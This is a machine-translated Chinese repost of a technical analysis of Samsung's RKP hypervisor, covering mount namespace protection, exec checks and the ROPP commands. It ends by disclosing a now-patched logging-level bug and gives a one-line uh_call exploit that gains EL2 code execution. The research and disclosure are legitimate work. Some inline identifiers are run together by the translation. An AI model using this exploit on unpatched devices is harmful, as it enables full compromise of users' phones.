这些实例（如和结构实例）在只读页面中分配。此结构还获取一个新字段，用于存储指向拥有此实例的结构的反向指针。vfsmountcredtask_security_structmount

▸ include/linux/mount.h

struct vfsmount {
    // ...
    struct mount *bp_mount; /* pointer to mount*/
    // ...
} __randomize_layout;

该结构也被修改为包含指向结构的指针，而不是结构本身。mountvfsmount

▸ include/linux/mount.h

struct mount {
    // ...
    struct vfsmount *mnt;
    // ...
} __randomize_layout;

在“凭据保护”部分中，我们解释了在每个 SELinux 安全钩子中调用 security_integrity_current 函数，并且此函数调用 cmp_ns_integrity 来验证挂载命名空间的完整性。

cmp_ns_integrity从此结构中检索任务的结构（包含指向所有每个进程命名空间的指针）、从中检索和根。然后，通过检查结构的反向指针是否指向结构来执行完整性验证。nsproxycurrentmnt_namespacemountvfsmountmount

▸ fs/namespace.c

extern u8 ns_prot;
unsigned int cmp_ns_integrity(void)
{
    struct mount *root = NULL;
    struct nsproxy *nsp = NULL;
    int ret = 0;    if((in_interrupt()
         || in_softirq())){
        return 0;
    }
    nsp = current->nsproxy;
    if(!ns_prot || !nsp ||
        !nsp->mnt_ns) {
        return 0;
    }
    root = current->nsproxy->mnt_ns->root;
    if(root != root->mnt->bp_mount){
        printk("\n RKP44_3 Name Space Mismatch %p != %p\n nsp = %p mnt_ns %p\n",root,root->mnt->bp_mount,nsp,nsp->mnt_ns);
        ret = 1;
    }
    return ret;
}

命名空间初始化¶

这些结构在 mnt_alloc_vfsmount 函数中使用只读缓存进行分配。此函数调用rkp_init_ns以初始化反向指针。vfsmountvfsmnt_cache

▸ fs/namespace.c

static int mnt_alloc_vfsmount(struct mount *mnt)
{
    struct vfsmount *vfsmnt = NULL;    vfsmnt = kmem_cache_alloc(vfsmnt_cache, GFP_KERNEL);
    if(!vfsmnt)
        return 1;
    spin_lock(&mnt_vfsmnt_lock);
    rkp_init_ns(vfsmnt,mnt);
//  vfsmnt->bp_mount = mnt;
    mnt->mnt = vfsmnt;
    spin_unlock(&mnt_vfsmnt_lock);
    return 0;
}

rkp_init_ns只需调用命令，将和实例传递给它。RKP_KDP_X52vfsmountmount

▸ fs/namespace.c

void rkp_init_ns(struct vfsmount *vfsmnt,struct mount *mnt)
{
    uh_call(UH_APP_RKP, RKP_KDP_X52, (u64)vfsmnt, (u64)mnt, 0, 0);
}

在虚拟机监控程序端，命令由调用 rkp_init_ns_hyp 的函数处理。它调用 chk_invalid_ns 来验证新结构是否有效，然后再对其进行操作并将其指向实例的反向指针。rkp_cmd_init_nsvfsmountmemsetmount

void rkp_init_ns_hyp(saved_regs_t* regs) {
  // ...  // Convert the VA of the vfsmount structure into a PA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Reset all of its content.
    memset(vfsmnt, 0, rkp_cred->NS_SIZE);
    // Set the back-pointer to the mount structure given as argument.
    *(vfsmnt + 8 * rkp_cred->BPMNT_VFSMNT_OFFSET) = regs->x3;
  }
}

chk_invalid_ns验证新实例是否有效（在结构大小上对齐）以及是否受虚拟机管理程序保护（在 physmap 中标记为）。vfsmountNS

int64_t chk_invalid_ns(uint64_t vfsmnt) {
  // The vfsmount instance must be aligned on the size of the structure.
  if (!vfsmnt || vfsmnt != vfsmnt / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE) {
    return 1;
  }
  rkp_phys_map_lock(vfsmnt);
  // Ensure it is marked as `NS` in the physmap.
  if (!is_phys_map_ns(vfsmnt)) {
    uh_log('L', "rkp_kdp.c", 882, "Name space physmap verification failed !!!!! %lx", vfsmnt);
    rkp_phys_map_unlock(vfsmnt);
    return 1;
  }
  rkp_phys_map_unlock(vfsmnt);
  return 0;
}

设置字段¶

该结构包含各种字段，这些字段需要内核在某个时候进行更改。与其他受保护的结构类似，它不能自行执行此操作，而是需要调用虚拟机管理程序。vfsmount

下表列出了每个字段调用该命令的内核函数和处理该命令的虚拟机管理程序函数。

田	内核函数	虚拟机监控程序函数
`mnt_root`/`mnt_sb`	`rkp_set_mnt_root_sb`	`rkp_cmd_ns_set_root_sb`
`mnt_flags`	`rkp_assign_mnt_flags`	`rkp_cmd_ns_set_flags`
`data`	`rkp_set_data`	`rkp_cmd_ns_set_data`

字段（指向已装入树的根的指针，是结构的实例）和字段（指向结构的指针）使用调用命令的 rkp_set_mnt_root_sb 函数进行更改。mnt_rootdentrymnt_sbsuper_blockRKP_KDP_X53

▸ fs/namespace.c

void rkp_set_mnt_root_sb(struct vfsmount *mnt,  struct dentry *mnt_root,struct super_block *mnt_sb)
{
    uh_call(UH_APP_RKP, RKP_KDP_X53, (u64)mnt, (u64)mnt_root, (u64)mnt_sb, 0);
}

此命令由调用 rkp_ns_set_root_sb 的虚拟机监控程序函数处理。此函数调用 chk_invalid_ns 来检查完整性，并将其和字段设置为作为参数提供的值。rkp_cmd_ns_set_root_sbvfsmountmnt_rootmnt_sb

void rkp_ns_set_root_sb(saved_regs_t* regs) {
  // ...  // Convert the vfsmount structure PA into a VA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Set the mnt_root field of the vfsmount structure to the dentry instance.
    *vfsmnt = regs->x3;
    // Set the mnt_sb field of the vfsmount structure to the super_block instance.
    *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET) = regs->x4;
  }
}

包含标志（如、、等）的字段使用调用命令的 rkp_assign_mnt_flags 函数进行更改。mnt_flagsMNT_NOSUIDMNT_NODEVMNT_NOEXECRKP_KDP_X54

▸ fs/namespace.c

void rkp_assign_mnt_flags(struct vfsmount *mnt,int flags)
{
    uh_call(UH_APP_RKP, RKP_KDP_X54, (u64)mnt, (u64)flags, 0, 0);
}

另外两个函数调用 rkp_assign_mnt_flags。第一个 rkp_set_mnt_flags 用于设置一个或多个标志。

▸ fs/namespace.c

void rkp_set_mnt_flags(struct vfsmount *mnt,int flags)
{
    int f = mnt->mnt_flags;
    f |= flags;
    rkp_assign_mnt_flags(mnt,f);
}

不出所料，第二个 rkp_reset_mnt_flags 用于取消设置一个或多个标志。

▸ fs/namespace.c

void rkp_reset_mnt_flags(struct vfsmount *mnt,int flags)
{
    int f = mnt->mnt_flags;
    f &= ~flags;
    rkp_assign_mnt_flags(mnt,f);
}

此命令由调用 rkp_ns_set_flags 的虚拟机监控程序函数处理。此函数调用 chk_invalid_ns 来检查完整性，并将其字段设置为作为参数提供的值。rkp_cmd_ns_set_flagsvfsmountflags

void rkp_ns_set_flags(saved_regs_t* regs) {
  // ...  // Convert the vfsmount structure PA into a VA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Set the flags field of the vfsmount structure.
    *(vfsmnt + 4 * rkp_cred->FLAGS_VFSMNT_OFFSET) = regs->x3;
  }
}

该字段包含特定于类型的数据，使用调用命令的 rkp_set_data 函数进行更改。dataRKP_KDP_X55

▸ fs/namespace.c

void rkp_set_data(struct vfsmount *mnt,void *data)
{
    uh_call(UH_APP_RKP, RKP_KDP_X55, (u64)mnt, (u64)data, 0, 0);
}

此命令由调用 rkp_ns_set_data 的虚拟机监控程序函数处理。此函数调用 chk_invalid_ns 来检查完整性，并将其字段设置为作为参数提供的值。rkp_cmd_ns_set_datavfsmountdata

void rkp_ns_set_data(saved_regs_t* regs) {
  // ...  // Convert the vfsmount structure PA into a VA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Set the data field of the vfsmount structure.
    *(vfsmnt + 8 * rkp_cred->DATA_VFSMNT_OFFSET) = regs->x3;
  }
}

新坐骑¶

作为命名空间保护功能的一部分调用的最后一个命令是命令。当创建新装载时，函数会调用它。此函数根据下面的列表检查挂载点的路径，然后调用虚拟机管理程序（如果它是特定路径之一）。RKP_KDP_X56rkp_populate_sb

/root
/product
/system
/vendor
/apex/com.android.runtime
/com.android.runtime@1

▸ fs/namespace.c

int art_count = 0;static void rkp_populate_sb(char *mount_point, struct vfsmount *mnt) 
{
    if (!mount_point || !mnt)
        return;
    if (!odm_sb &&
        !strncmp(mount_point, KDP_MOUNT_PRODUCT, KDP_MOUNT_PRODUCT_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&odm_sb, (u64)mnt, KDP_SB_ODM, 0);
    } else if (!rootfs_sb &&
        !strncmp(mount_point, KDP_MOUNT_ROOTFS, KDP_MOUNT_ROOTFS_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&rootfs_sb, (u64)mnt, KDP_SB_SYS, 0);
    } else if (!sys_sb &&
        !strncmp(mount_point, KDP_MOUNT_SYSTEM, KDP_MOUNT_SYSTEM_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&sys_sb, (u64)mnt, KDP_SB_SYS, 0);
    } else if (!vendor_sb &&
        !strncmp(mount_point, KDP_MOUNT_VENDOR, KDP_MOUNT_VENDOR_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&vendor_sb, (u64)mnt, KDP_SB_VENDOR, 0);
    } else if (!art_sb &&
        !strncmp(mount_point, KDP_MOUNT_ART, KDP_MOUNT_ART_LEN - 1)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
    } else if ((art_count < ART_ALLOW) &&
        !strncmp(mount_point, KDP_MOUNT_ART2, KDP_MOUNT_ART2_LEN - 1)) {
        if (art_count)
            uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
        art_count++;
    }
}

rkp_populate_sb被调用自，而本身也被调用自。do_new_mountdo_mount

▸ fs/namespace.c

static int do_new_mount(struct path *path, const char *fstype, int sb_flags,
            int mnt_flags, const char *name, void *data)
{
    // ...
    buf = kzalloc(PATH_MAX, GFP_KERNEL);
    if (!buf){
        kfree(buf);
        return -ENOMEM;
    }
    dir_name = dentry_path_raw(path->dentry, buf, PATH_MAX);    if(!sys_sb || !odm_sb || !vendor_sb || !rootfs_sb || !art_sb || (art_count < ART_ALLOW)) 
        rkp_populate_sb(dir_name,mnt);
    kfree(buf);
    // ...
}

在虚拟机管理程序端，该命令由处理，该命令调用 rkp_ns_set_sys_vfsmnt。它通过调用 chk_invalid_ns 来确保作为参数给出的结构有效。然后，它将其字段（指向源文件系统挂载的超级块的指针）复制到目标超级块指针中，然后再次将此值存储在结构的其中一个字段中。rkp_cmd_ns_set_sys_vfsmntvfsmountmnt_sbrkp_cred

void* rkp_ns_set_sys_vfsmnt(saved_regs_t* regs) {
  // ...  // If the `rkp_cred` structure is not initialized, i.e. `rkp_cred_init` has not been called.
  if (!rkp_cred) {
    uh_log('W', "rkp_kdp.c", 931, "RKP_ae6cae81");
    return;
  }
  // Convert the destination superblock VA to a PA.
  dst_sb = rkp_get_pa(regs->x2);
  // Convert the source file system mount VA to a PA.
  vfsmnt = rkp_get_pa(regs->x3);
  // Get the enum value indicating which mount point this is.
  mount_point = regs->x4;
  // Ensure the vfsmnt structure is valid and hypervisor-protected.
  if (!vfsmnt || chk_invalid_ns(vfsmnt) || mount_point >= KDP_SB_MAX) {
    uh_log('L', "rkp_kdp.c", 945, "Invalid  source vfsmnt  %lx %lx %lx\n", regs->x3, vfsmnt, mount_point);
    return;
  }
  // Sanity-check: the destination superblock must not be NULL.
  if (!dst_sb) {
    uh_log('L', "rkp_kdp.c", 956, "dst_sb is NULL %lx %lx %lx\n", regs->x2, 0, regs->x3);
    return;
  }
  // Get the mnt_sb field (pointer to superblock) of the vfsmount structure.
  mnt_sb = *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET);
  // Set the pointer to the destination superblock to the mnt_sb field value.
  *dst_sb = mnt_sb;
  // Depending on the mount point, set the corresponding field of the `rkp_cred` structure.
  switch (mount_point) {
    case KDP_SB_ROOTFS:
      *rkp_cred->SB_ROOTFS = mnt_sb;
      break;
    case KDP_SB_ODM:
      *rkp_cred->SB_ODM = mnt_sb;
      break;
    case KDP_SB_SYS:
      *rkp_cred->SB_SYS = mnt_sb;
      break;
    case KDP_SB_VENDOR:
      *rkp_cred->SB_VENDOR = mnt_sb;
      break;
    case KDP_SB_ART:
      *rkp_cred->SB_ART = mnt_sb;
      break;
  }
}

可执行文件加载¶

挂载命名空间保护功能允许在内核加载可执行二进制文件时进行额外检查。验证发生在函数中，该函数是从支持的二进制格式的加载器调用的（请参阅这篇 LWN.net 文章）。此机制还可以防止滥用在以前的 Samsung RKP 旁路中使用的命令。flush_old_execcall_usermodehelper

如果当前任务具有特权，则通过调用确定，该函数将调用以确保可执行文件的挂载点有效。如果不是，它会让内核崩溃。is_rkp_priv_taskflush_old_execinvalid_drive

▸ fs/exec.c

int flush_old_exec(struct linux_binprm * bprm)
{
    // ...
    if(rkp_cred_enable &&
        is_rkp_priv_task() && 
        invalid_drive(bprm)) {
        panic("\n KDP_NS_PROT: Illegal Execution of file #%s#\n", bprm->filename);
    }
    // ...
}

is_rkp_priv_task只需检查当前任务的 UID、EUID、GID 或 EGID 是否低于或等于 1000 （）。SYSTEM

▸ fs/exec.c

#define RKP_CRED_SYS_ID 1000static int is_rkp_priv_task(void)
{
    struct cred *cred = (struct cred *)current_cred();
    if(cred->uid.val <= (uid_t)RKP_CRED_SYS_ID || cred->euid.val <= (uid_t)RKP_CRED_SYS_ID ||
        cred->gid.val <= (gid_t)RKP_CRED_SYS_ID || cred->egid.val <= (gid_t)RKP_CRED_SYS_ID ){
        return 1;
    }
    return 0;
}

invalid_drive首先从正在加载的二进制文件的结构中检索结构。它通过调用 rkp_ro_page 来确保它受到虚拟机监控程序保护（尽管这并不意味着它一定是预期的类型）。如果然后将其超级块传递给函数，以确定挂载点是否有效。vfsmountfilekdp_check_sb_mismatch

▸ fs/exec.c

static int invalid_drive(struct linux_binprm * bprm) 
{
    struct super_block *sb =  NULL;
    struct vfsmount *vfsmnt = NULL;    vfsmnt = bprm->file->f_path.mnt;
    if(!vfsmnt || 
        !rkp_ro_page((unsigned long)vfsmnt)) {
        printk("\nInvalid Drive #%s# #%p#\n",bprm->filename, vfsmnt);
        return 1;
    } 
    sb = vfsmnt->mnt_sb;
    if(kdp_check_sb_mismatch(sb)) {
        printk("\n Superblock Mismatch #%s# vfsmnt #%p#sb #%p:%p:%p:%p:%p:%p#\n",
                    bprm->filename, vfsmnt, sb, rootfs_sb, sys_sb, odm_sb, vendor_sb, art_sb);
        return 1;
    }
    return 0;
}

kdp_check_sb_mismatch，如果设备未恢复且未解锁，则将超级块与允许的超级块（即、、、和）进行比较。/root/system/product/vendor/apex/com.android.runtime

▸ fs/exec.c

static int kdp_check_sb_mismatch(struct super_block *sb) 
{   
    if(is_recovery || __check_verifiedboot) {
        return 0;
    }
    if((sb != rootfs_sb) && (sb != sys_sb)
        && (sb != odm_sb) && (sb != vendor_sb) && (sb != art_sb)) {
        return 1;
    }
    return 0;
}

JOPP 和 ROPP 命令¶

我们在有关内核利用的部分中解释说，JOPP 仅在高端三星设备上启用，而在高端 Snapdragon 设备上启用 ROPP。对于与这些功能相关的虚拟机管理程序命令的这一小节，我们将查看 Snapdragon 设备（美国版 S10）的内核源代码和 RKP 二进制文件。

我们认为虚拟机管理程序中 JOPP 和 ROPP 的初始化命令，rkp_cmd_jopp_init 和 rkp_cmd_ropp_init 分别是由引导加载程序（S-Boot）调用的，尽管我们无法确认。

第一个命令处理程序 rkp_cmd_jopp_init 不做任何有趣的事情。

int64_t rkp_cmd_jopp_init() {
  uh_log('L', "rkp.c", 502, "CFP JOPP Enabled");
  return 0;
}

第二个命令处理程序 rkp_cmd_ropp_init 需要一个参数结构，该结构需要以幻值（0x4A4C4955）开头。此结构将复制到固定的物理地址（0xB0240020）。如果另一个物理地址（0x80001000）的内存与另一个幻值（0xCDEFCDEF）匹配，则结构将在最后一个物理地址（0x80001020）处再次复制。

int64_t rkp_cmd_ropp_init(saved_regs_t* regs) {
  // ...  // Convert the argument structure VA to a PA.
  arg_struct = virt_to_phys_el1(regs->x2);
  // Check if it begins with the expected magic value.
  if (*arg_struct == 0x4a4c4955) {
    // Copy the structure to a fixed physical address.
    memcpy(0xb0240020, arg_struct, 80);
    // If the memory at another PA contains another magic value.
    if (*(uint32_t*)0x80001000 == 0xcdefcdef) {
      // Copy the structure to another fixed PA.
      memcpy(0x80001020, arg_struct, 80);
    }
    uh_log('L', "rkp.c", 529, "CFP ROPP Enabled");
  } else {
    uh_log('W', "rkp.c", 515, "RKP_e08bc280");
  }
  return 0;
}

此外，ROPP 还使用了另外两个命令，即 rkp_cmd_ropp_save 和 rkp_cmd_ropp_reload，用于处理“主密钥”。

rkp_cmd_ropp_save什么也没做，可能被引导加载程序调用了，但我们再次无法确认它。

int64_t rkp_cmd_ropp_save() {
  return 0;
}

rkp_cmd_ropp_reload 由程序集宏中的内核调用。ropp_secondary_init

▸ arch/arm64/include/asm/rkp_cfp.h

/*
 * secondary core will start a forked thread, so rrk is already enc'ed
 * so only need to reload the master key and thread key
 */
    .macro ropp_secondary_init ti
    reset_sysreg
    //load master key from rkp
    ropp_load_mk
    //load thread key
    ropp_load_key \ti
    .endm    .macro ropp_load_mk
#ifdef CONFIG_UH
    push    x0, x1
    push    x2, x3
    push    x4, x5
    mov x1, #0x10 //RKP_ROPP_RELOAD
    mov x0, #0xc002 //UH_APP_RKP
    movk    x0, #0xc300, lsl #16
    smc #0x0
    pop x4, x5
    pop x2, x3
    pop x0, x1
#else
    push    x0, x1
    ldr x0, = ropp_master_key
    ldr x0, [x0]
    msr RRMK, x0
    pop x0, x1
#endif
    .endm

此宏是从程序集函数调用的，该函数在启动辅助内核时执行。__secondary_switched

▸ arch/arm64/kernel/head.S

__secondary_switched:
    // ...
    ropp_secondary_init x2
    // ...
ENDPROC(__secondary_switched)

rkp_cmd_ropp_reload，命令处理程序本身将系统寄存器（保存 RRMK 或 ROPP 功能使用的“主密钥”）设置为从固定物理地址（0xB0240028）读取的值。DBGBVR5_EL1

int64_t rkp_cmd_ropp_reload() {
  set_dbgbvr5_el1(*(uint32_t*)0xb0240028);
  return 0;
}

这完成了我们对三星 RKP 内部工作原理的解释。我们已经详细介绍了虚拟机管理程序是如何初始化的，它如何处理来自较低 EL 的异常，以及它如何处理内核页表——所有这些都是为了保护可能成为漏洞利用目标的关键内核数据结构。

现在，我们将揭示我们发现的一个漏洞，该漏洞现已修复，该漏洞允许在EL2上执行代码。我们将在 Exynos 设备上利用此漏洞，但它也应该在 Snapdragon 设备上运行，但需要进行一些小改动。

以下是有关我们正在查看的二进制文件的一些信息：

Exynos 设备 - 三星 A51 （SM-A515F）

固件版本：A515FXXU3BTF4
虚拟机管理程序版本：Feb 27 2020

骁龙设备 - 三星 Galaxy S10 （SM-G973U）

固件版本：G973USQU4ETH7
虚拟机管理程序版本：Feb 25 2020

描述¶

如果您在阅读这篇博文时一直密切关注，您可能已经注意到我们尚未详细说明的两个重要功能：uh_log 和 rkp_get_pa。现在让我们回顾一下它们，从uh_log开始。

uh_log做了一些相当标准的字符串格式化和打印，我们在下面的代码片段中省略了这些，但它也做了其他事情。如果作为第一个参数给出的日志级别是（debug），则它也会调用 uh_panic。这在一会儿就会变得很重要......'D'

int64_t uh_log(char level, const char* filename, uint32_t linenum, const char* message, ...) {
  // ...  // ...
  if (level == 'D') {
    uh_panic();
  }
  return res;
}

现在，我们将注意力转向rkp_get_pa，许多命令处理程序都调用它来转换内核输入。如果虚拟地址位于 fixmap 中，则它会从（内核物理内存的开头）开始计算物理地址。如果它不在修复映射中，它将调用 virt_to_phys_el1 来执行硬件转换。如果硬件转换不成功，它将计算物理地址（内核 VA 和 PA 之间的偏移量）。最后，它调用 check_kernel_input 来检查是否可以使用该地址。PHYS_OFFSETKIMAGE_VOFFSET

int64_t rkp_get_pa(uint64_t vaddr) {
  // ...  if (!vaddr) {
    return 0;
  }
  if (vaddr < 0xffffffc000000000) {
    paddr = virt_to_phys_el1(vaddr);
    if (!paddr) {
      if ((vaddr & 0x4000000000) != 0) {
        paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
      } else {
        paddr = vaddr - KIMAGE_VOFFSET;
      }
    }
  } else {
    paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
  }
  check_kernel_input(paddr);
  return paddr;
}

virt_to_phys_el1使用 AT S12E1R（EL1 读取访问的第 2 级和第 1 级）指令来转换虚拟地址。如果模拟内核读取访问的转换失败，它将使用 AT S12E1W（EL1 写入访问的阶段 2 和 1）指令。如果模拟内核写入访问的转换失败并且启用了 MMU，它将打印堆栈内容。

int64_t virt_to_phys_el1(int64_t vaddr) {
  // ...  if (vaddr) {
    at_s12e1r(vaddr);
    par_el1 = get_par_el1();
    if ((par_el1 & 1) != 0) {
      at_s12e1w(vaddr);
      par_el1 = get_par_el1();
    }
    if ((par_el1 & 1) != 0) {
      if ((get_sctlr_el1() & 1) != 0) {
        uh_log('W', "general.c", 128, "%s: wrong address %p", "virt_to_phys_el1", vaddr);
        if (!has_printed_stack_contents) {
          has_printed_stack_contents = 1;
          print_stack_contents();
        }
        has_printed_stack_contents = 0;
      }
      vaddr = 0;
    } else {
      vaddr = par_el1 & 0xfffffffff000 | vaddr & 0xfff;
    }
  }
  return vaddr;
}

如果内核提供的 VA（已转换为 PA）可以安全使用，则返回 check_kernel_input 函数。它仅检查物理地址是否包含在内存列表中。如“启动后的整体状态”部分所述，此内存列表包含启动后：protected_ranges

pa_restrict_init 年添加了 0x87000000-0x87200000（uH 区域）
在init_cmd_initialize_dynamic_heap中添加的所有位图physmap

int64_t check_kernel_input(uint64_t paddr) {
  // ...  res = protected_ranges_contains(paddr);
  if (res) {
    res = uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
  }
  return res;
}

这应该可以有效地防止内核给出一个地址，该地址一旦转换，就会落入虚拟机管理程序内存中。但是，如果检查失败，则使用级别而不是级别调用uh_log函数，这意味着虚拟机监控程序不会崩溃，并且执行将继续，就好像什么都没发生过一样。这个简单错误的影响是巨大的：我们可以将虚拟机管理程序内存中的地址提供给所有命令处理程序。'L''D'

开发¶

利用此漏洞是微不足道的。使用正确的参数调用其中一个命令处理程序就足以立即获取任意写入。例如，我们可以使用命令，该命令由我们之前看到的 rkp_l3pgt_write 函数处理。只需找到要编写的内容以及在哪里编写它以破坏虚拟机管理程序的问题。RKP_CMD_WRITE_PGT3

下面是我们的单行漏洞利用，它通过添加跨越整个虚拟机管理程序内存的 2 级块描述符来针对我们设备的第 2 阶段页表。通过将描述符的位设置为 0b11，内存映射是可写的，并且由于s1_enable中设置的位仅适用于 EL2 的地址转换，而不适用于 EL1 的地址转换，因此我们现在可以从内核自由修改虚拟机管理程序代码。S2APWXN

uh_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3, 0xffffffc00702a1c0, 0x870004fd);

补丁¶

我们注意到之后构建的二进制文件包含此漏洞的补丁，但我们不知道它是私下披露的还是在内部发现的。它应该影响了所有配备 Exynos 和 Snapdragon 芯片组的设备。May 27 2020

让我们看一下可用于我们的研究设备的最新固件更新，看看有哪些变化。首先，check_kernel_input功能。有趣的是，他们没有简单地更改日志级别，而是复制了对uh_log的调用。这很奇怪，但至少它完成了这项工作。

int64_t check_kernel_input(uint64_t paddr) {
  // ...  res = protected_ranges_contains(paddr);
  if (res) {
    uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
    uh_log('D', "pa_restrict.c", 96, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
  }
  return res;
}

我们还注意到，在二进制差异时，他们在rkp_get_pa中添加了一些额外的检查。他们现在正在强制将物理地址包含在内存列表中。安全总比后悔好！dynamic_regions

int64_t rkp_get_pa(uint64_t vaddr) {
  // ...  if (!vaddr) {
    return 0;
  }
  if (vaddr < 0xffffffc000000000) {
    paddr = virt_to_phys_el1(vaddr);
    if (!paddr) {
      if ((vaddr & 0x4000000000) != 0) {
        paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
      } else {
        paddr = vaddr - KIMAGE_VOFFSET;
      }
    }
  } else {
    paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
  }
  check_kernel_input(paddr);
  if (!memlist_contains_addr(&uh_state.dynamic_regions, paddr)) {
    uh_log('L', "rkp_paging.c", 70, "RKP_68592c58 %lx", paddr);
    uh_log('D', "rkp_paging.c", 71, "RKP_68592c58 %lx", paddr);
  }
  return paddr;
}

让我们回顾一下三星 RKP 提供的各种保护：

页表不能直接由内核修改;

除了 3 级表，但在这种情况下，PXNTable 位被设置;
对 EL1 处虚拟存储器系统寄存器的访问被捕获;
页表在第 2 阶段地址转换中设置为只读;

防止双重映射，但检查仅由内核完成;

仍然无法使内核文本读写或新区域可执行;

敏感的内核全局变量在区域中移动（只读）;.rodata
由于三星对 SLUB 分配器进行了修改，敏感内核数据结构（，，）被分配在只读页面上;credtask_security_structvfsmount

不是系统的任务不能突然变成系统或根;
可以设置credtask_struct
但是下一个操作，如执行 shell，将触发冲突;
a 各种操作，检查正在运行的任务的凭据：
凭据也会被引用计数，以防止它们被其他任务重复使用;

无法从特定挂载点外部以 root 身份执行二进制文件;
在 Snapdragon 设备上，ROPP（ROP 预防）也由 RKP 启用。

在对三星 RKP 内部结构的深入探讨中，我们了解了安全虚拟机管理程序如何帮助防止内核漏洞利用。与其他纵深防御措施一样，它使获得读写访问权限的攻击者更难完全破坏内核。但是，这项伟大的工程工作并不能防止在实现中犯（有时是简单的）错误。

关于虚拟机管理程序，我们这里没有提到更多的东西，但值得后续的博客文章：我们尚不能谈论的未修补漏洞，解释 Exynos 和 Snapdragon 实现之间的差异，深入研究 S20 的新框架等。

解除（Hyper）Visor：绕过三星的实时内核保护

三星：“rkp_mark_adbd”中的RKP内存损坏
三星：“cfp_ropp_new_key_reenc”和“cfp_ropp_new_key”中的RKP内存损坏
三星：通过 EL1 中未受保护的 MSR 将 RKP 权限提升到内存管理控制寄存器
三星：RKP EL1 代码加载旁路
三星：通过 s2-remapping 物理范围披露 RKP 信息
三星：通过“rkp_set_init_page_ro”的RKP内存损坏
三星：通过在高通设备上缺乏 MSR 捕获来绕过 RKP 内核保护

虚拟机管理程序死灵法术;恢复内核保护程序

模拟虚拟机管理程序：三星 RKP 案例研究

以零特权击败三星 KNOX
新的可靠 Android 内核根漏洞利用

KNOX 内核缓解绕过

其它课程
windows网络安全防火墙与虚拟网卡（更新完成）
windows文件过滤(更新完成)
USB过滤(更新完成)
游戏安全(更新中)
ios逆向
windbg
恶意软件开发（更新中）
还有很多免费教程(限学员)
更多详细内容添加作者微信

文章来源: http://mp.weixin.qq.com/s?__biz=MzkwOTE5MDY5NA==&mid=2247491046&idx=2&sn=04b5df71d886b42d2cee28e30f65e1f5&chksm=c04983183180de38e7bf81669a8eb4dbc44a329eac5ff5341cbe7237c60f4a016c6f5385052f&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh